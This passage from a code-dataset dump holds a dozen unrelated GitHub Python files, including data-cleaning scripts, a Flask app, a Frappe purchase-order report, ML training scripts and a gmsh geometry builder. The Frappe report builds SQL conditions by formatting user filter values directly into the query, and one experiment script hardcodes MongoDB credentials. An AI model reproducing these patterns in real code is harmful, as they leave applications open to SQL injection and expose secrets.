df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Imad-Cherigui/Disaster-response-pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41196452174","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import render_template\n\nfrom trello import Trello\n\n\napp = Flask(__name__)\n\n\n#stats = {}\n\n@app.route(\"/\")\ndef root():\n return render_template('index.html')\n\n@app.route(\"/year/\")\ndef year(year):\n stats = {}\n year = int(year)\n if year not in stats:\n print(f\"Stats for {year} not found, hitting API\")\n stats[year] = Trello.get_yearly_stats(year)\n return jsonify(stats[year])\n\n@app.route(\"/years\")\ndef available_years():\n return jsonify(Trello.get_available_years())\n\nif __name__ == '__main__':\n app.run()\n\n\n","repo_name":"theletterd/yearly_goals","sub_path":"yearly_goals.py","file_name":"yearly_goals.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19790346704","text":"import pandas as pd\r\nimport csv\r\n\r\nfile1='C:/Users/a2z/Downloads/c-127-hw--main/c-127-hw--main/bright_stars.csv'\r\nfile2='C:/Users/a2z/Downloads/c-127-hw--main/c-127-hw--main/dwarf_stars .csv'\r\nd1=[]\r\nd2=[]\r\nwith open(file1,'r' ,encoding='utf-8')as f:\r\n reader=csv.reader(f)\r\n for i in reader:\r\n d1.append(i)\r\n\r\nwith open(file2,'r' ,encoding='utf-8')as g:\r\n reader=csv.reader(g)\r\n for i in reader:\r\n d2.append(i)\r\n\r\nh1=d1[0]\r\n#print(h1)\r\nh2=d2[0]\r\nh=h1+h2\r\np_d1=d1[1:]\r\np_d2=d2[1:]\r\np_d=[]\r\nfor i in p_d1:\r\n p_d.append(i)\r\nfor i in p_d2:\r\n p_d.append(i)\r\nwith open('total_stars.csv','w',encoding='utf-8')as f:\r\n csv_writer=csv.writer(f)\r\n csv_writer.writerow(h)\r\n csv_writer.writerows(p_d)\r\ndf=pd.read_csv('total_stars.csv')\r\n\r\n","repo_name":"Aditi-the-best/C-129","sub_path":"C-129.py","file_name":"C-129.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27446369152","text":"\nimport frappe\n#from frappe import __\n\ndef execute(filters=None):\n columns = get_columns()\n conditions=get_conditions(filters)\n data=get_data(filters,conditions)\n return columns, data\n\ndef get_columns():\n columns = [\n {\n 'fieldname': 'company',\n 'label': 'Company',\n 'fieldtype': \"Data\",\n },\n { \n 'fieldname': 'supplier_group',\n 'label': 'Supplier_Group',\n 'fieldtype': \"Link\",\n 'options': 'Supplier Group'\n },\n {\n 'fieldname': 'name',\n 'label': 'Name',\n 'fieldtype': \"Data\",\n },\n {\n 'fieldname': 'supplier_name',\n 'label': 'Supplier',\n 'fieldtype': \"Link\",\n 'options': 'Supplier'\n },\n {\n 'fieldname': 'rate',\n 'label': 'Rate',\n 'fieldtype': \"float\",\n },\n {\n 'fieldname': 'amount',\n 'label': 'Amount',\n 'fieldtype': \"float\",\n },\n {\n 'fieldname': 'item_code',\n 'label': 'Item_Code',\n 'fieldtype': \"Link\",\n 'options': 'Item' \n }\n \n ]\n return columns\ndef get_conditions(filters):\n conditions=\"\"\n if filters.get(\"company\"):\n conditions+= \"and p.company='{}'\".format(filters.get('company'))\n\n if filters.get(\"supplier_group\"):\n conditions+=\"and `tabSupplier`.supplier_group='{}'\".format(filters.get('supplier_group'))\n if filters.get(\"name\"):\n conditions+=\"and p.name='{}'\".format(filters.get('name'))\n return conditions\n\ndef get_data(filters,conditions):\n query=frappe.db.sql(\"\"\" select p.company,tabSupplier.supplier_group,\n p.name,`tabSupplier`.supplier_name,\n `tabPurchase Order Item`.rate,`tabPurchase Order Item`.amount,\n `tabPurchase Order Item`.item_code from `tabPurchase Order`p\n left join `tabPurchase Order Item` on p.name=`tabPurchase Order Item`.parent \n left join `tabSupplier` on `tabSupplier`.supplier_name=p.supplier where \n `tabSupplier`.supplier_name!= '' %s\"\"\" %(conditions),as_dict=1) \n return query\n\n\n","repo_name":"prachibobade/testrepo","sub_path":"library_management/library_management/report/test4/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35302761701","text":"#!/usr/bin/env python3\n\"\"\"Trains a machine learning model suitable for mutant selection.\n\nRun `train_model.py --help` for more information.\n\"\"\"\n\nimport argparse\nimport glob\nimport os\nimport os.path\n\nimport joblib\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport sklearn_pandas\nfrom scipy import sparse\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import Ridge\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler\n\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument(\"--model\", required=True, choices=[\"linear\", \"randomforest\"])\narg_parser.add_argument(\"--data\", required=True, choices=[\"all\", \"small\"])\narg_parser.add_argument(\"--out\", required=True, type=str)\narg_parser.add_argument(\n \"--project_only\",\n action=\"store_true\",\n help=\"If set, training data will only be drawn from the same project.\",\n)\narg_parser.add_argument(\n \"--between_projects\",\n action=\"store_true\",\n help=\"If set, training data will only be drawn from other projects.\",\n)\narg_parser.add_argument(\n \"results_dir\",\n type=str,\n help=\"The directory to search for customized_mutants.csv files.\",\n)\nargs = arg_parser.parse_args()\n\nassert not (args.project_only and args.between_projects), \"Args cannot be combined\"\n\n# Validate the results_dir is a directory.\nassert os.path.isdir(args.results_dir)\n\n# Find the customized_mutants.csv files for each individual project.\n# (e.g., '{results_dir}/Codec/18f/customized-mutants.csv')\npaths = glob.glob(os.path.join(args.results_dir, \"**/**/*customized-mutants.csv\"))\nif not paths:\n raise Exception(f\"No customized-mutants.csv files found in {args.results_dir}\")\n\n# Read all results and concatenate into a single DataFrame: cm_df\ncm_dfs = []\nfor path in paths:\n print(f\"Reading: {path}\")\n cm_dfs.append(pd.read_csv(path))\ncm_df = pd.concat(cm_dfs)\n\n# We're only interested in covered mutants, so immediately discard uncovered.\ncm_df.isCovered = cm_df.isCovered.astype(\"bool\")\ncm_df = cm_df[cm_df.isCovered]\n\n# Assert that we only have one bug ID per project\nassert (cm_df.groupby(\"projectId\").bugId.nunique() == 1).all()\n\nif args.data == \"small\":\n mapper = sklearn_pandas.DataFrameMapper(\n [\n (\n [\"mutationOperator\", \"parentStmtContextDetailed\"],\n OneHotEncoder(handle_unknown=\"ignore\"),\n )\n ]\n )\nelif args.data == \"all\":\n mapper = sklearn_pandas.DataFrameMapper(\n [\n ([\"lineRatio\"], [SimpleImputer(strategy=\"mean\"), StandardScaler()]),\n (\n [\"nestingIf\", \"nestingLoop\", \"nestingTotal\", \"maxNestingInSameMethod\"],\n StandardScaler(),\n ),\n (\n [\n \"nestingRatioLoop\",\n \"nestingRatioIf\",\n \"nestingRatioTotal\",\n \"hasOperatorChild\",\n \"hasVariableChild\",\n \"hasLiteralChild\",\n ],\n None,\n ),\n (\n [\"nodeTypeBasic\", \"nodeTypeDetailed\"],\n [\n SimpleImputer(strategy=\"constant\", fill_value=\"Unknown\"),\n OneHotEncoder(handle_unknown=\"ignore\"),\n ],\n ),\n (\n [\n \"mutationOperator\",\n \"mutationOperatorGroup\",\n \"nodeContextBasic\",\n \"astContextBasic\",\n \"astContextDetailed\",\n \"astStmtContextBasic\",\n \"astStmtContextDetailed\",\n \"parentContextBasic\",\n \"parentContextDetailed\",\n \"parentStmtContextBasic\",\n \"parentStmtContextDetailed\",\n ],\n OneHotEncoder(handle_unknown=\"ignore\"),\n ),\n ]\n )\nelse:\n raise Exception(f\"Unexpected --data arg: \" + str(args.data))\n\nX_all = mapper.fit_transform(cm_df.copy()).astype(np.float32)\ny_all = cm_df.pKillsDom.values.copy()\n\nif args.model == \"linear\":\n X_all = sparse.csc_matrix(X_all)\nelif args.model == \"randomforest\":\n X_all = sparse.csc_matrix(X_all)\n\n\ndef _fit_model(project_id, train_set_selection, selection_key):\n assert (cm_df.projectId == project_id).any()\n bug_id = cm_df[cm_df.projectId == project_id].bugId.drop_duplicates()\n assert len(bug_id) == 1\n bug_id = bug_id.iloc[0]\n\n X = X_all[train_set_selection]\n assert not np.shares_memory(X, X_all)\n y = y_all[train_set_selection]\n\n assert X.shape[0] < len(cm_df)\n assert y.shape[0] < len(cm_df)\n\n if args.model == \"linear\":\n model = Ridge(solver=\"sparse_cg\", copy_X=False)\n elif args.model == \"randomforest\":\n model = RandomForestRegressor(\n max_depth=3,\n n_estimators=10,\n n_jobs=1,\n # n_jobs=max(1, os.cpu_count() // 8),\n )\n else:\n raise Exception(f\"Unexpected model arg: \" + str(args.model))\n model.fit(X, y)\n return (project_id, bug_id, selection_key), model\n\n\ndef fit_model(project_id, held_out_class_name):\n assert (cm_df.className == held_out_class_name).any()\n train_set_selection = cm_df.className != held_out_class_name\n if args.project_only:\n train_set_selection = train_set_selection & (cm_df.projectId == project_id)\n return _fit_model(project_id, train_set_selection, {\"class\": held_out_class_name})\n\n\ndef fit_model_from_other_projects(project_id):\n assert isinstance(project_id, str)\n train_set_selection = cm_df.projectId != project_id\n return _fit_model(project_id, train_set_selection, {\"project\": project_id})\n\n\nproject_names = [\n tuple(row)\n for _, row in cm_df[[\"projectId\", \"className\"]].drop_duplicates().iterrows()\n]\nproject_classes = [\n tuple(row)\n for _, row in cm_df[[\"projectId\", \"className\"]].drop_duplicates().iterrows()\n]\n\nif args.data == \"small\":\n n_jobs = int(os.getenv(\"TRAIN_MODEL_CPUS\", \"-1\"))\nelif args.data == \"all\":\n n_jobs = int(os.getenv(\"TRAIN_MODEL_CPUS\", \"8\"))\n\nelse:\n raise Exception(f\"Unexpected model arg: \" + str(args.model))\n\nif args.between_projects:\n fit_model_delayed = joblib.delayed(fit_model_from_other_projects)\n parallel_jobs = [fit_model_delayed(n) for n in cm_df.projectId.drop_duplicates()]\nelse:\n fit_model_delayed = joblib.delayed(fit_model)\n parallel_jobs = [fit_model_delayed(*t) for t in project_classes]\nprint(f\"Training {len(parallel_jobs)} models\")\nresults = joblib.Parallel(n_jobs=n_jobs, verbose=61)(parallel_jobs)\n\n# Save all results, including models, to disk\nprint(f\"Writing to: {args.out}\")\njoblib.dump((mapper, results), args.out)\n","repo_name":"ryuparish/mutant_prioritization","sub_path":"artifact/code/data_analysis/ml/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13506678857","text":"from math import pi\nfrom argparse import ArgumentParser\nimport gmsh\n\nSIZE_DOMAIN_Y = 5000.0\n\ndef z_offset_at(y: float) -> float:\n \"\"\"\n Compute the difference in z-coordinate between reference and physical space\n according to eq. (4.1) of the description for SPE11 Version C, given a\n y-coordinate in the reference space.\n \"\"\"\n f = (y - 2500.0)/2500.0\n return 150.0*(1.0 - f*f) + 10.0*y/SIZE_DOMAIN_Y\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Create the geometry for SPE11 version C\")\n parser.add_argument(\n \"-s\",\n \"--mesh-size\",\n required=True,\n help=\"Set the characteristic mesh size in the domain. This will be defined in the\"\n \"last line of the created .geo file, where you can edit it manually afterwards\"\n )\n args = vars(parser.parse_args())\n\n gmsh.initialize()\n gmsh.open(\"spe11b.geo\")\n\n print(\"Reading entities & physical groups from the model\")\n entities = {\n \"points\": [(tag, gmsh.model.getValue(0, tag, [])) for _, tag in gmsh.model.getEntities(0)],\n \"curves\": [(tag, gmsh.model.getAdjacencies(1, tag)[1]) for _, tag in gmsh.model.getEntities(1)],\n \"surfaces\": [(tag, gmsh.model.getAdjacencies(2, tag)[1]) for _, tag in gmsh.model.getEntities(2)]\n }\n surface_to_physical_properties = {}\n for dim, index in gmsh.model.getPhysicalGroups(dim=2):\n name = gmsh.model.getPhysicalName(dim, index)\n for tag in gmsh.model.getEntitiesForPhysicalGroup(dim, index):\n assert tag not in surface_to_physical_properties\n surface_to_physical_properties[tag] = {\"name\": name, \"index\": index}\n\n print(\"Defining new model using the OCC kernel\")\n gmsh.model.add(\"occ_model\")\n gmsh.model.setCurrent(\"occ_model\")\n\n print(\"Adding points\")\n for tag, coordinates in entities[\"points\"]:\n gmsh.model.occ.addPoint(*coordinates, tag=tag)\n\n print(\"Adding curves\")\n for tag, (p0, p1) in entities[\"curves\"]:\n gmsh.model.occ.addLine(p0, p1, tag=tag)\n\n print(\"Adding surfaces\")\n for tag, curve_tags in entities[\"surfaces\"]:\n wire_tag = gmsh.model.occ.addCurveLoop(curve_tags, tag=tag)\n stag = gmsh.model.occ.addPlaneSurface([wire_tag], tag=tag)\n\n print(\"Rotating model such that the surfaces align with the z-axis\")\n gmsh.model.occ.synchronize()\n bbox = gmsh.model.getBoundingBox(-1, -1)\n min, max = tuple(bbox[:3]), tuple(bbox[3:])\n gmsh.model.occ.rotate(\n dimTags=gmsh.model.getEntities(2),\n x=0.5*(max[0] - min[0]), y=min[1], z=0.0,\n ax=1.0, ay=0.0, az=0.0,\n angle=pi/2.0\n )\n\n print(\"Copying Surfaces to the back of the domain\")\n gmsh.model.occ.synchronize()\n frontside_surface_tags = gmsh.model.getEntities(dim=2)\n backside_surface_tags = gmsh.model.occ.copy(frontside_surface_tags)\n backside_dz = z_offset_at(SIZE_DOMAIN_Y)\n gmsh.model.occ.translate(backside_surface_tags, dx=0.0, dy=SIZE_DOMAIN_Y, dz=backside_dz)\n\n def _make_connecting_spline(source_tag: int, target_tag: int) -> tuple[int, list]:\n source = gmsh.model.getValue(0, source_tag, [])\n target = gmsh.model.getValue(0, target_tag, [])\n assert abs(source[0] - target[0]) < 1e-8*SIZE_DOMAIN_Y \\\n and abs(abs(source[2] - target[2]) - backside_dz) < 1e-8*SIZE_DOMAIN_Y \\\n and \"Unexpected geometric relation between front and back side points\"\n\n extrusion_length = 5000.0\n num_support_points = 10\n dy = extrusion_length/float(num_support_points+1) # first/last point are source/target\n\n support_point_tags = [source_tag]\n for i in range(num_support_points):\n y_reference = source[1] + float(i + 1)*dy\n support_point_tags.append(\n gmsh.model.occ.addPoint(\n x=source[0],\n y=source[1] + y_reference,\n z=source[2] + z_offset_at(y_reference)\n )\n )\n return gmsh.model.occ.addBSpline(support_point_tags + [target_tag]), support_point_tags[1:]\n\n print(\"Creating connecting surfaces and volumes\")\n physical_volumes = {}\n front_point_to_connecting_spline_index = {}\n front_curve_to_connecting_surface_index = {}\n gmsh.model.occ.synchronize()\n for i, (front, back) in enumerate(zip(frontside_surface_tags, backside_surface_tags)):\n print(f\"Creating volume {i+1} of {len(frontside_surface_tags)}\", end=\"\\r\")\n front_boundary_curves = gmsh.model.getBoundary([front], recursive=False)\n back_boundary_curves = gmsh.model.getBoundary([back], recursive=False)\n assert len(front_boundary_curves) == len(back_boundary_curves)\n\n bounding_surface_tags = [front[1]]\n for front_curve, back_curve in zip(front_boundary_curves, back_boundary_curves):\n assert front_curve[1] > 0 and back_curve[1] > 0 \\\n or front_curve[1] < 0 and back_curve[1] < 0\n\n abs_front_curve = abs(front_curve[1])\n if abs_front_curve in front_curve_to_connecting_surface_index:\n bounding_surface_tags.append(front_curve_to_connecting_surface_index.get(abs_front_curve))\n else:\n front_curve_points = gmsh.model.getBoundary([front_curve], recursive=False)\n back_curve_points = gmsh.model.getBoundary([back_curve], recursive=False)\n assert len(front_curve_points) == len(back_curve_points)\n assert len(front_curve_points) == 2\n\n pfront_0, pfront_1 = front_curve_points[0][1], front_curve_points[1][1]\n pback_0, pback_1 = back_curve_points[0][1], back_curve_points[1][1]\n spline1, points1 = front_point_to_connecting_spline_index.get(pfront_0), []\n spline2, points2 = front_point_to_connecting_spline_index.get(pfront_1), []\n\n if spline1 is None:\n spline1, points1 = _make_connecting_spline(pfront_0, pback_0)\n front_point_to_connecting_spline_index[pfront_0] = spline1\n if spline2 is None:\n spline2, points2 = _make_connecting_spline(pfront_1, pback_1)\n front_point_to_connecting_spline_index[pfront_1] = spline2\n\n curve_loop = [spline1, spline2]\n if front_curve[1] < 0:\n curve_loop = list(reversed(curve_loop))\n wire_tag = gmsh.model.occ.addWire([front_curve[1], *curve_loop, -back_curve[1]])\n bounding_surface_tags.append(gmsh.model.occ.addSurfaceFilling(wire_tag, tag=wire_tag))\n front_curve_to_connecting_surface_index[abs_front_curve] = bounding_surface_tags[-1]\n\n # remove support points\n gmsh.model.occ.remove(dimTags=[(0, t) for t in points1], recursive=False)\n gmsh.model.occ.remove(dimTags=[(0, t) for t in points2], recursive=False)\n\n bounding_surface_tags.append(back[1])\n physical_props = surface_to_physical_properties[front[1]]\n physical_index = physical_props[\"index\"]\n surf_loop = gmsh.model.occ.addSurfaceLoop(bounding_surface_tags)\n volume_tag = gmsh.model.occ.addVolume([surf_loop])\n if physical_index not in physical_volumes:\n physical_volumes[physical_index] = {\"name\": physical_props[\"name\"], \"volumes\": []}\n physical_volumes[physical_index][\"volumes\"].append(volume_tag)\n\n print(\"Writing .brep geometry file\")\n base_filename = \"spe11c\"\n brep_filename = f\"{base_filename}.brep\"\n gmsh.model.occ.synchronize()\n gmsh.write(brep_filename)\n print(f\"Wrote '{brep_filename}'\")\n\n print(\"Writing .geo file with physical volume definitions\")\n geo_filename = f\"{base_filename}.geo\"\n with open(geo_filename, \"w\") as geo_file:\n geo_file.write(f'Merge \"{brep_filename}\";\\n')\n for physical_index, properties in physical_volumes.items():\n volume_tags_str = \",\".join(str(t) for t in properties[\"volumes\"])\n geo_file.write(f\"Physical Volume({physical_index}) = {{{volume_tags_str}}};\\n\")\n geo_file.write(f\"Characteristic Length{{:}} = {args['mesh_size']};\\n\")\n print(f\"Wrote '{geo_filename}'\")\n","repo_name":"Simulation-Benchmarks/11thSPE-CSP","sub_path":"geometries/make_spe11c_geo.py","file_name":"make_spe11c_geo.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"29"} +{"seq_id":"23575784644","text":"# demo/urls.py\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^NumberReport/', views.NumberReport, name='NumberReport'),\n url(r'^NumberOrganizeReport/', views.NumberOrganizeReport, name='NumberOrganizeReport'),\n]","repo_name":"MiracleShen/djangoProject","sub_path":"crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72412154319","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\n\ndef add_user(users, name, email):\n user_id = max(user[\"id\"] for user in users) + 1\n new_user = {\"id\": user_id, \"name\": name, \"email\": email, \"favorite_cars\": []}\n users.append(new_user)\n return new_user\n\ndef delete_user(users, user_id):\n for user in users:\n if user[\"id\"] == user_id:\n users.remove(user)\n return\n print(\"No user with the specified ID was found\")\n\ndef add_car_to_user(users, user_id, car_id):\n user = get_user(users, user_id)\n if car_id not in user[\"favorite_cars\"]:\n user[\"favorite_cars\"].append(car_id)\n\ndef delete_car_from_user(users, user_id, car_id):\n user = get_user(users, user_id)\n if car_id in user[\"favorite_cars\"]:\n user[\"favorite_cars\"].remove(car_id)\n\ndef get_user(users, user_id):\n for user in users:\n if user[\"id\"] == user_id:\n return user\n print(\"The car is not assigned as a favorite to the user\")\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--add\", action=\"store_true\", help=\"Add a new user\")\n parser.add_argument(\"--delete\", type=int, help=\"Delete a user by their ID\")\n parser.add_argument(\"--add_car\", nargs=2, type=int, help=\"Add a car as a favorite to a user\")\n parser.add_argument(\"--delete_car\", nargs=2, type=int, help=\"Remove a car from a user's favorites list\")\n args = parser.parse_args()\n\n with open(\"../data/users.json\", \"r\") as users_file:\n data = json.load(users_file)\n users = data[\"usuarios\"]\n\n if args.add:\n name = input(\"Enter the name of the new user: \")\n email = input(\"Enter the email of the new user: \")\n new_user = add_user(users, name, email)\n print(\"The new user has been added with ID \" + str(new_user['id']))\n elif args.delete:\n delete_user(users, args.delete)\n print(\"User has been deleted successfully\")\n \n elif args.add_car:\n add_car_to_user(users, args.add_car[1], args.add_car[0])\n print(\"The car has been added as a favorite to the user successfully\")\n \n elif args.delete_car:\n delete_car_from_user(users, args.delete_car[1], args.delete_car[0])\n print(\"Car successfully removed from user favorites list\")\n \n else:\n print(\"No valid command specified\")\n\n with open(\"../data/users.json\", \"w\") as users_file:\n json.dump(data, users_file, indent=2)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fximenessilva/cars_app","sub_path":"frontend/src/script/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29829071616","text":"import abc\n\n\nclass ConfigCreator(metaclass=abc.ABCMeta):\n\n def __init__(self, layers, count_id):\n self.layers = layers\n self.count_id = count_id\n\n def write_file(self, file):\n pass\n\n\nclass ConfigCreatorCmd(ConfigCreator):\n\n commands = dict()\n\n def set_section_commands(self):\n sections = self.layers.get_sections_of_count(self.count_id)\n\n self.set_command(\n 'SITE',\n self.layers.get_installation_name_of_count(self.count_id))\n self.set_command('LOCATION', sections[0].attribute('name'))\n self.set_command(\n 'FILENAME',\n self.layers.get_installation_name_of_count(self.count_id))\n self.set_command(\n 'CLASS',\n self.layers.get_class_name_of_count(self.count_id))\n self.set_command('LPLENS', '200')\n\n lanes = self.layers.get_lanes_of_count(self.count_id)\n sensor_type = self.layers.get_sensor_type_of_count(self.count_id)\n channels_str = ''\n sensors_str = ''\n carriageway_nr = 0\n sensor_length = None\n\n for i, lane in enumerate(lanes):\n channels_str += '{} '.format(i+1)\n if sensor_type.attribute('name') == 'Boucle':\n sensors_str += '{} '.format('LL')\n else:\n sensors_str += '{} '.format('TT')\n\n if self.layers.check_sensor_of_lane(lane.id()):\n carriageway_nr += 1\n\n length = self.layers.get_sensor_length(lane.id())\n if length:\n sensor_length = length\n\n self.set_command('CHANNELS', channels_str)\n self.set_command('SENSORS', sensors_str)\n\n self.set_command(\n 'CARRIAGEWAY',\n ' '.join('1' * carriageway_nr) + ' ' + ' '.join('0' * (8 - carriageway_nr)))\n\n if sensor_length and sensor_length < 6:\n self.set_command('LPSEPS', '300')\n else:\n self.set_command('LPSEPS', '500')\n\n def set_command(self, command, value):\n self.commands[command] = value\n\n def set_predefined_config(self):\n return self.layers.get_predefined_config_from_count(self.count_id)\n\n def write_file(self, file):\n with open(file, 'w') as f:\n f.write('{}\\n'.format(self.set_predefined_config()))\n for command in self.commands.keys():\n f.write('{} = {}\\n'.format(command, self.commands[command]))\n","repo_name":"opengisch/OpenComptage","sub_path":"comptages/config/config_creator.py","file_name":"config_creator.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"21128309736","text":"import torch\r\nfrom torch import nn\r\nfrom .common import ResnetBlock\r\n\r\n\r\nclass EncoderBlock(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\r\n super(EncoderBlock, self).__init__()\r\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)\r\n self.bn = nn.BatchNorm2d(out_channels)\r\n self.activition = nn.LeakyReLU(1)\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.bn(x)\r\n x = self.activition(x)\r\n return x\r\n\r\n\r\nclass EncoderNetwork(nn.Module):\r\n def __init__(self,\r\n image_size,\r\n in_channels,\r\n use_labelmap=False,\r\n latent_dim=512,\r\n base_channels=16,\r\n num_layers=3):\r\n super(EncoderNetwork, self).__init__()\r\n\r\n total_layers = num_layers + 1\r\n assert (image_size % (2**total_layers) == 0) and (image_size > 0)\r\n\r\n self.image_size = image_size\r\n self.use_labelmap = use_labelmap\r\n self.latent_dim = latent_dim\r\n input_channels = in_channels + self.use_labelmap\r\n conv_layers = [EncoderBlock(input_channels, base_channels, 4, 2, 1)] # first encoder layer\r\n for i in range(num_layers):\r\n channels = base_channels * (2**i)\r\n conv_layers += [\r\n ResnetBlock(channels),\r\n EncoderBlock(channels, channels * 2, kernel_size=4, stride=2, padding=1)\r\n ]\r\n\r\n conv_out_channels = base_channels * (2**num_layers)\r\n conv_layers += [ResnetBlock(conv_out_channels)]\r\n self.conv = nn.Sequential(*conv_layers)\r\n\r\n conv_out_features = (image_size // (2**total_layers))**2\r\n self.fc = nn.Linear(conv_out_features * conv_out_channels, self.latent_dim)\r\n\r\n def forward(self, x, labelmap=None):\r\n if self.use_labelmap:\r\n assert labelmap is not None\r\n x = torch.cat((x, labelmap), 1)\r\n x = self.conv(x)\r\n x = x.view(x.shape[0], -1)\r\n x = self.fc(x)\r\n return x\r\n","repo_name":"dhbloo/ChunkGAN-pytorch","sub_path":"networks/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37273350794","text":"\"\"\"\nDefine a function pyramid_volume with parameters base_length, base_width, and pyramid_height, that returns the volume of a pyramid with a rectangular base.\n\nSample output with inputs: 4.5 2.1 3.0\nVolume for 4.5, 2.1, 3.0 is: 9.45\nRelevant geometry equations:\nVolume = base area x height x 1/3\nBase area = base length x base width.\n\"\"\"\n\ndef pyramid_volume(base_length, base_width, pyramid_height):\n base_area = base_length * base_width\n volume = base_area * pyramid_height * (1/3)\n return volume\n\nlength = float(input())\nwidth = float(input())\nheight = float(input())\nprint('Volume for 4.5, 2.1, 3.0 is:', pyramid_volume(length, width, height))\n","repo_name":"bdpetersen13/IT140-Introduction-to-Scripting","sub_path":"Module_Five/Function_Definition.py","file_name":"Function_Definition.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"430782537","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\n\nfrom sklearn.datasets import load_digits\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm, neural_network\nfrom matplotlib import pyplot as plt\n\nfrom Transimprove.Pipeline import Pipeline\nfrom Experiments.helper.create_distributed_labels import generate_new_annotations_confusionmatrix\nfrom yellowbrick.classifier import ClassificationReport\nfrom yellowbrick.classifier import ConfusionMatrix\n\n\"\"\"\n The class runs our experiments using Scikit-learn. It uses the same logic as designed in the proof_of_concept.py and\n saves all parameters using sacred.\n Make sure that the docker containers are running. See the README.md for execution instructions and the sacred\n documentation at https://sacred.readthedocs.io.\n For pipeline application see the Transimprove readme in the Transimprove folder.\n \"\"\"\n\nex = Experiment('SklearnProofOfConcept')\nload_dotenv()\nmongodb_port = os.getenv(\"MONGO_DB_PORT\")\nuri = \"mongodb://sample:password@localhost:\" + str(mongodb_port) + \"/db?authSource=admin\"\nex.observers.append(MongoObserver.create(url=uri, db_name='db'))\n\n\n@ex.config\ndef cfg():\n train_size = 0.9\n test_size = 0.4\n train_random = 42\n test_random = 42\n gamma = 0.001\n confusion_matrix = np.array([\n # ['0', 1, 2, 3, 4 5 6 7 8 9]\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 0\n [0, 0.7, 0, 0, 0, 0, 0, 0.3, 0, 0], # 1\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], # 2\n [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], # 3\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], # 4\n [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], # 5\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], # 6\n [0, 0.3, 0, 0, 0, 0, 0, 0.7, 0, 0], # 7\n [0, 0, 0, 0, 0, 0, 0, 0, 0.7, 0.3], # 8\n [0, 0, 0, 0, 0, 0, 0, 0, 0.3, 0.7] # 9\n ])\n consistency_min = 0.5\n consistency_max = 1.0\n annotations_per_label = 1000\n\n\ndef classifier_report(classifier, X_test, y_test):\n classes = np.unique(y_test)\n cm = ConfusionMatrix(classifier, classes=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n cm.fit(X_test, y_test)\n cm.score(X_test, y_test)\n filename = classifier.__class__.__name__ + '_confusion_matrix.png'\n cm.poof(outpath=filename, clear_figure=True,\n kwargs=dict(transparent=False, dpi=80, inches='tight'))\n ex.add_artifact(filename)\n visualizer = ClassificationReport(classifier, classes=classes, support=True)\n visualizer.fit(X_test, y_test)\n visualizer.score(X_test, y_test)\n visualizer.poof(outpath=\"classification_report.png\", clear_figure=True,\n kwargs=dict(transparent=False, dpi=80, inches='tight'))\n ex.add_artifact('classification_report.png')\n\n\n@ex.capture\ndef create_dataset_split(X, y, train_size, train_random, test_size, test_random):\n X_existing_model, X_unseen, y_existing_model, y_unseen = train_test_split(X, y, test_size=train_size,\n 